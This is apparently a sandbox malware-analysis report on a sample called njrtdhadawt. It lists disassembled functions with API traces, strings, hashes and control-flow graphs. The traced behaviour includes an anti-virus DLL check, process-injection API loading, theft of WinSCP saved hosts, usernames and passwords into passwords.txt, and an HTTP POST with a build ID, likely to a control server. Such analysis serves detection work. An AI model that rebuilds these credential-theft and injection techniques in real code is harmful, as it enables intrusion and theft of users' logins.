                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6E09270D1021C9BCF21DFA0ED599DD73FCAF04204F4045B5E605E3184D6B4AB889F80
                                                                                                                                                                                                                                                          Function 00FE149D Relevance: 1.3, APIs: 1, Instructions: 40stringCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,?,?,?,?,?,00FE14F3,avghookx.dll,00FF7FC6), ref: 00FE14CF
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcmpi
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1586166983-0
                                                                                                                                                                                                                                                          • Opcode ID: fdc7626d6448d267a570384b87506c32fee5f21072150372c4e276b5190a0f7f
                                                                                                                                                                                                                                                          • Instruction ID: d65366c1f267b4d629e48592304a1855867f5f29218f646683ae1c891203ec2d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fdc7626d6448d267a570384b87506c32fee5f21072150372c4e276b5190a0f7f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D4F05836A04154ABCF21CF5AD804AAAFBB8FB43760F256054E809B7240C330ED11EA98
                                                                                                                                                                                                                                                          Function 00FF83D2 Relevance: 231.5, APIs: 121, Strings: 11, Instructions: 518libraryloaderCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                          • String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
                                                                                                                                                                                                                                                          • API String ID: 2238633743-2740034357
                                                                                                                                                                                                                                                          • Opcode ID: b73603037cb249450de0fea45d9dd8ce0feff7d65578589bc590beae7866a5f9
                                                                                                                                                                                                                                                          • Instruction ID: 5fd2c4269188aa9f43b826eb5a5c95a279d4a97063b252d29b856459a6ca5405
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b73603037cb249450de0fea45d9dd8ce0feff7d65578589bc590beae7866a5f9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A52E979401216EFDBB25F65FA4D8663BB3F72C345381C426EB858226CEB724860EF50
                                                                                                                                                                                                                                                          Function 00FEE33A Relevance: 56.3, APIs: 18, Strings: 14, Instructions: 325registryCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FEE36B
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FEE38B
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FEE39C
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FEE3AD
                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00FEE3E1
                                                                                                                                                                                                                                                          • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 00FEE412
                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00FEE42A
                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00FEE451
                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00FEE471
                                                                                                                                                                                                                                                          • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 00FEE494
                                                                                                                                                                                                                                                          • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,01015927), ref: 00FEE52D
                                                                                                                                                                                                                                                          • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 00FEE58D
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _memset$Value$CloseOpen$Enum
                                                                                                                                                                                                                                                          • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                                                                                                                                                                                          • API String ID: 463713726-2798830873
                                                                                                                                                                                                                                                          • Opcode ID: efab34c028da9bd62b7f002fea08d1200eb7ac2272b34a67ebf746a089db3dae
                                                                                                                                                                                                                                                          • Instruction ID: bc17be707dd185169d7a3ce12d92d2c6006d42f7169f162d52ef4af80a6b35c4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: efab34c028da9bd62b7f002fea08d1200eb7ac2272b34a67ebf746a089db3dae
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9D1C97291012DAADB20EB91DC41BEDB778AF04304F4144E7A608B7126DBB57F85DFA1
                                                                                                                                                                                                                                                          Function 00FE5F2B Relevance: 53.0, APIs: 20, Strings: 10, Instructions: 466networkstringmemoryCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 263 fe5f2b-fe5ff0 call ff073c call fe4aa7 call ff070a * 5 InternetOpenA StrCmpCA 278 fe5ff8-fe5ffe 263->278 279 fe5ff2 263->279 280 fe6004-fe618e call ff1e6d call ff07ea call ff07b0 call fe2910 * 2 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff07ea call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07ea call ff07b0 call fe2910 * 2 InternetConnectA 278->280 281 fe66f1-fe6719 InternetCloseHandle call fe8696 278->281 279->278 280->281 357 fe6194-fe61ce HttpOpenRequestA 280->357 286 fe671b-fe6753 call ff076c call ff082c call ff07b0 call fe2910 281->286 287 fe6758-fe67de call fe2910 * 4 call fe1cce call fe2910 call ffcab4 281->287 286->287 358 fe61d4-fe61da 357->358 359 fe66e5-fe66eb InternetCloseHandle 357->359 360 fe61dc-fe61f2 InternetSetOptionA 358->360 361 fe61f8-fe6682 call ff082c call ff07b0 call fe2910 call ff07ea call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff07ea call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff07ea call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff07ea call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff07ea call ff07b0 call fe2910 lstrlenA * 2 GetProcessHeap HeapAlloc lstrlenA call 1006af0 lstrlenA * 2 call 1006af0 lstrlenA HttpSendRequestA 358->361 359->281 360->361 504 fe66c4-fe66dc InternetReadFile 361->504 505 fe66de-fe66df InternetCloseHandle 504->505 506 fe6684-fe668c 504->506 505->359 506->505 507 fe668e-fe66bf call ff082c call ff07b0 call fe2910 506->507 507->504
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00FF073C: lstrcpyA.KERNEL32(00000000,?,?,00FE1CF7,?,00FF7504), ref: 00FF075B
                                                                                                                                                                                                                                                            • Part of subcall function 00FE4AA7: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00FE4AD9
                                                                                                                                                                                                                                                            • Part of subcall function 00FE4AA7: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00FE4ADF
                                                                                                                                                                                                                                                            • Part of subcall function 00FE4AA7: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00FE4AE5
                                                                                                                                                                                                                                                            • Part of subcall function 00FE4AA7: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00FE4AF7
                                                                                                                                                                                                                                                            • Part of subcall function 00FE4AA7: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00FE4AFF
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                          • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00FE5FCA
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 00FE5FE8
                                                                                                                                                                                                                                                          • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FE6180
                                                                                                                                                                                                                                                          • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00FE61C4
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,",mode,01016928,------,0101691C,a21440e9f7223be06be5f5e2f94969c7,",build_id,01016904,------,010168F8,",010168EC,------), ref: 00FE65EF
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00FE65FE
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FE6609
                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00FE6610
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00FE661D
                                                                                                                                                                                                                                                          • _memmove.LIBCMT ref: 00FE662B
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00FE6639
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,00000000), ref: 00FE6647
                                                                                                                                                                                                                                                          • _memmove.LIBCMT ref: 00FE6654
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,00000000), ref: 00FE6669
                                                                                                                                                                                                                                                          • HttpSendRequestA.WININET(00000000,?,00000000), ref: 00FE6677
                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00FE66D4
                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00FE66DF
                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 00FE66EB
                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 00FE66F7
                                                                                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00FE61F2
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
                                                                                                                                                                                                                                                          • String ID: "$"$"$------$------$------$------$a21440e9f7223be06be5f5e2f94969c7$build_id$mode
                                                                                                                                                                                                                                                          • API String ID: 3702379033-3626711658
                                                                                                                                                                                                                                                          • Opcode ID: 0c60369923cbf35be8dde33bdd8937809b7e43066b1624f0695f7af51e6a5d97
                                                                                                                                                                                                                                                          • Instruction ID: 1fb96129410a69a2cebf87023a8004c197b1d84d6e61999cea6f0689d40b5227
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c60369923cbf35be8dde33bdd8937809b7e43066b1624f0695f7af51e6a5d97
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7022A73290016D9BCF61EB61DC46BDDB775AF04300F4184E2A60977126DAB57F8AAFD0
                                                                                                                                                                                                                                                          Function 00FF3D63 Relevance: 49.7, APIs: 2, Strings: 26, Instructions: 674stringCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 513 ff3d63-ff4782 call ff070a call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff0ee3 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff17f7 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff18a7 call ff07ea call ff07b0 call fe2910 * 2 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff0bc5 call ff07ea call ff07b0 call fe2910 * 2 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 GetCurrentProcessId call ff246d call ff07ea call ff07b0 call fe2910 * 2 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff0d53 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff1a2a call ff07ea call ff07b0 call fe2910 * 2 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff1bba call ff07ea call ff07b0 call fe2910 * 2 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff0ea8 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff0e76 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff1786 call ff07ea call ff07b0 call fe2910 * 2 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff0ffe call ff07ea call ff07b0 call fe2910 * 2 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff0ee3 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff0f51 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff1174 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff122a call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff11dd call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff133c call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff13b5 call ff07ea call ff07b0 call fe2910 * 2 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff16c8 call ff07ea call ff07b0 call fe2910 * 2 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff1426 call ff07ea call ff07b0 call fe2910 * 2 call ff1426 call ff07ea call ff07b0 call fe2910 * 2 call ff082c call ff07b0 call fe2910 call fe1ced lstrlenA call ff070a call ff7074 call fe2910 * 2 call fe1cce
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
